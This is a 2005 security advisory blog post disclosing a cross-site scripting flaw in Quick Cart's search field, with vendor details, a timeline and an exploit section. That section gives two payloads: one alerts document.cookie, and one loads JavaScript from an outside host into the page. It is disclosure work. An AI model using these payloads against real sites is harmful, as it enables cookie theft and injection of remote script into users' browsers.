#####################################################
Quick Cart Search field cross site scripting and script insercion
vendor url:http://www.quickcart.com/
advisore:http://lostmon.blogspot.com/2005/05/
quick-cart-search-field-cross-site.html
vendor notify: yes exploit available: yes
Securitytracker:1014076
#####################################################
Quick Cart contains a flaw that allows a remote cross
site scripting attack.This flaw exists because the
application does not validate the 'search' field upon
submission to 'search.cfm' script.This could allow a user
to create a specially crafted URL that would execute
arbitrary code in a user's browser within the trust
relationship between the browser and the server,
leading to a loss of integrity.
############
versions
############
free edition affected:
https://www.quickcart.com/qc_checkout.cfm
but is posible other versions ( standar or others) are afected
################
solution
################
no solution was available at this time
#############
Timeline
#############
discovered: 10 may 2005
vendor notify: 27 may 2005
vendor response: 27 may 2005
disclosure: 29 may 2005
##############
exploit
##############
put in the search box of the store:
//"><script>alert(document.cookie)</script>
or
//"><SCRIPT src="http://www.drorshalev.com/dev/injection/js.js"></script>
and the script is executing , this is a XSS flaw
and a posible script insercion
#################### €nd ###################
Thnx to http://www.drorshalev.com for this script
and for hosting it for this demostration.
thnx to estrella to be my ligth
thnx to all http://www.osvdb.org Team
thnx to all who day after day support me !!!
--
atentamente:
Lostmon (lostmon@gmail.com)
Web-Blog: http://lostmon.blogspot.com/
Data Mangler of: http://www.osvdb.org
--
La curiosidad es lo que hace mover la mente
Subscribe to:
Posts (Atom)